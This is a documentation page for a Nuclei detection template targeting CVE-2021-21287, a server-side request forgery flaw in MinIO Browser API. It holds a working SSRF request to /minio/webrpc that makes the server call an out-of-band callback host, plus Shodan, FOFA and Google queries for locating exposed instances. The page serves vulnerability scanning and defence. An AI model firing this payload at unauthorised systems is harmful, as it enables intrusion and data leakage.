Skip to content
Nuclei Templates

MinIO Browser API - Server-Side Request Forgery

ID: CVE-2021-21287

Severity: high

Author: pikpikcu

Tags: cve,cve2021,minio,ssrf,oast

Description

Section titled “Description”

MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2021-21287


info:
  name: MinIO Browser API - Server-Side Request Forgery
  author: pikpikcu
  severity: high
  description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest security patches or updates provided by MinIO to fix this vulnerability.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
    - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
    - https://github.com/minio/minio/pull/11337
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21287
    - https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2021-21287
    cwe-id: CWE-918
    epss-score: 0.97268
    epss-percentile: 0.99855
    cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: minio
    product: minio
    shodan-query:
      - http.title:"minio browser"
      - cpe:"cpe:2.3:a:minio:minio"
      - http.title:"minio console"
    fofa-query:
      - title="minio console"
      - app="minio"
      - title="minio browser"
    google-query:
      - intitle:"minio browser"
      - intitle:"minio console"
  tags: cve,cve2021,minio,ssrf,oast


http:
  - raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{interactsh-url}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
        Content-Length: 76


        {"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http" # Confirms the HTTP Interaction


      - type: word
        words:
          - "We encountered an internal error"
# digest: 4b0a00483046022100a557663d2794186c3c062e3fc10c7907a686bee305cde91b4d5a0be403ca07b9022100c40e1de2535dc385e5906ef86b5b61348ae20028884324698aa5c9ccb901f7e4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21287.yaml"

View on Github